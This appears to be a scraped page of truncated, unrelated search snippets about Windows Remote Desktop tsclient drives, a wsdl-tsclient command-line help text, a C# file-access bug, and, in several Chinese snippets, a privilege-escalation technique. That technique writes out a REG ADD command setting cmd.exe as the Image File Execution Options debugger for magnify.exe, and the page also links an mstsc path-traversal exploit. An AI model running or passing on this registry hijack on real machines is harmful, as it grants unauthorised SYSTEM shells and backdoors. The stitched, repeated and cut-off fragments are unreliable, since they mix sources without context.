查看注册表权限,发现普通用户可以写入 get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl * 镜像劫持到放大镜 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /d "cmd.exe" 或者镜像劫持...
https://github.com/0xedh/mstsc-path-traversal c、限制条件 首先最重要的,还是要开启 mstsc 的剪切板功能。 其次,同 tsclient 的攻击方式类似,该漏洞的触发依旧依托于开机自启,因此对服务器的攻击效果较差。 此外,如果受害者不进行复制粘贴操作,也无法触发次漏洞,而多次进行复制粘贴又会触发文件重复弹窗(修改脚本...
get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl * 对这个命令进行解析: Image File Execution Options是注册表中的一项,在执行可执行文件前会先去调用,主要用于调试和控制可执行文件的行为.而上述命令会将该项的信息以列表形式输出. 我们发现NT AUTHORITY\...
wsdl-tsclient [options] [path] Options: --help Showhelp[boolean] -v, --version [boolean] -o Output directory [string] [required] --emitDefinitionsOnly Generate only Definitions [boolean] --modelNamePreffix Prefixforgenerated interface names[string] --modelNameSuffix Suffixforgenerated interface nam...
string filePath = “\\tsclient\C\Test\TestMemoryIssue.docx”; using (FileStream fs = new FileStream(filePath, FileMode.Open, FileAccess.ReadWrite)) { long length = fs. Length; long newLength = length + 5; fs. SetLength(newLength); } } Exception thrown: SetLength calls SetLengthCor...
wsdl-tsclient [options] [path] Options: --help Show help [boolean] -v, --version [boolean] -o Output directory [string] [required] --emitDefinitionsOnly Generate only Definitions [boolean] --modelNamePreffix Prefix for generated interface names[string] --modelNameSuffix Suffix for generated in...
Hi, We are using WVD and when we open a published application in Remote Desktop and try to open a file from that application. We navigate to \\tssclient...
Get-ACL -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl 发现NT AUTHORITY\Authenticated Users可以修改注册表 即所有账号密码登录的用户都可以修改注册表,利用这个性质,修改注册表,使用放大镜进行提权 执行下面的语句,修改注册表。
There is a feature in mstsc (remote desktop connection client) which enables you to share your selected local drives to the server as \\tsclient\<disk letter>. I can only access it in Multi Commander if I manually write \\tsclient\D to the path box. ...
Compile and run the following C# (.Net Framework 4.8) program (I did it in VS 2022 Professional) static void Main(string[] args) { // Throws exception when SetLength is called below string filePath = “\\tsclient\C\Test\TestMemoryIssue.docx”; ...